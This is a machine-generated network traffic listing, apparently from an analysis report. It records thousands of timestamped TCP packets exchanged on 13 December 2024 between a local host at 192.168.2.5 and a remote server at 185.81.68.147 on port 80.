                                                                                                                                                                Dec 13, 2024 01:37:36.075371027 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.075387955 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.075412989 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.075427055 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.075448990 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.075463057 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.075490952 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.075508118 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.075531006 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.075555086 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.075568914 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.075598001 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.075612068 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.075637102 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.075650930 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.075776100 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.075803995 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.075819969 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.075881958 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.075905085 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.075920105 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.076009989 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.076009989 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.076029062 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.076037884 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.076071978 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.076097965 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.076111078 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.076133966 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.076148987 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.076170921 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.076189041 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.076210976 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.076222897 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.076244116 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.076257944 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.076287985 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.076455116 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.076484919 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.076498032 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.076523066 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.076545954 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.076562881 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.076585054 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.076598883 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.076621056 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.076647043 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.076666117 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.076682091 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.076709986 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.076731920 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.076757908 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.076775074 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.076797009 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.076811075 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.076833963 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.076860905 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.076877117 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.076899052 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.076913118 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.076934099 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.076967001 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.076982021 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.076993942 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.077019930 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.077039003 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.077070951 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.077085018 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.077111959 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.077128887 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.077150106 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.077177048 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.077192068 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.077218056 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.077276945 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.077301025 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.077334881 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.077352047 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.077379942 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.077434063 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.077452898 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.077481985 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.077498913 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.077519894 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.077534914 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.077559948 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.077583075 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.077595949 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.077622890 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.077637911 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.077657938 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.077682018 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.077696085 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.077721119 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.077745914 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.077769995 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.077795029 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.077810049 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.077831984 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.077847004 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.077868938 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.077894926 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.077917099 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.077930927 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.077948093 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.077974081 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.077989101 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.078023911 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.078043938 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.078069925 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.078085899 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.078120947 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.078135967 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.078159094 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.078175068 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.078201056 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.078226089 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.078241110 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.078265905 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.078279972 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.078305006 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.078331947 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.078355074 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.078368902 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.078392982 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.078444958 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.078476906 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.078504086 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.078517914 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.078552008 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.078569889 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.078603983 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.078646898 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.078660965 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.078681946 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.078710079 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.078733921 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.078748941 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.078778982 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.078803062 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.078819036 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.078846931 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.078862906 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.078885078 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.078897953 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.078919888 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.078943014 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.078958035 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.078980923 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.078994989 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.079018116 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.079049110 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.079065084 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.079090118 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.079117060 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.079139948 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.079168081 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.079190969 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.079205990 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.079229116 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.079246044 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.079276085 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.079291105 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.079328060 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.079343081 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.079360008 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.079392910 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.079413891 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.079426050 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.079451084 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.079464912 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.079489946 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.079505920 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.079531908 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.079545021 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.079569101 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.079586983 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.079600096 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.079654932 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.079677105 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.079703093 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.079720020 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.079746008 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.079761028 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.079790115 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.079824924 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.079848051 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.079864979 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.079886913 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.079901934 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.079919100 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.079941034 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.079973936 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.079996109 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.080008984 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.080033064 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.080056906 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.080071926 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.080094099 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.080123901 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.080140114 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.080154896 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.080171108 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.080188036 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.080205917 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.080229044 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.080252886 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.080264091 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.080281019 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.080302000 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.080322027 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.080333948 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.080360889 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.080377102 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.080382109 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.080395937 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.080396891 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.080416918 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.080432892 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.080454111 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.080461025 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.080470085 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.080473900 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.080492020 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.080507994 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.080529928 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.080543995 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.080564976 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.080570936 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.080579996 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.080585957 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.080600977 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.080605984 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.080610037 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.080624104 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.080631018 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.080646992 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.080660105 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.080696106 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.080710888 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.080734015 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.080748081 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.080770016 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.080786943 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.080807924 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.080818892 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.080826044 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.080835104 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.080866098 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.080874920 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.080878973 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.080890894 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.080899954 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.080907106 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.080915928 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.080950975 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.080965996 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.080996037 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.080998898 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.081047058 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.081052065 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.081063032 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.081069946 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.081072092 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.081098080 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.081113100 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.081137896 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.081151009 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.081173897 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.081187963 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.081207991 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.081224918 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.081248045 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.081262112 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.081283092 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.081300020 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.081330061 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.081348896 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.081376076 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.081389904 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.081413984 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.081429005 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.081449032 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.081464052 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.081485033 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.081501007 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.081521034 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.081535101 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.081558943 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.081573963 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.081597090 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.081610918 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.081631899 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.081649065 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.081676960 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.081691980 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.081712961 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.081727982 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.081751108 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.081764936 CET4977580192.168.2.5185.81.68.147
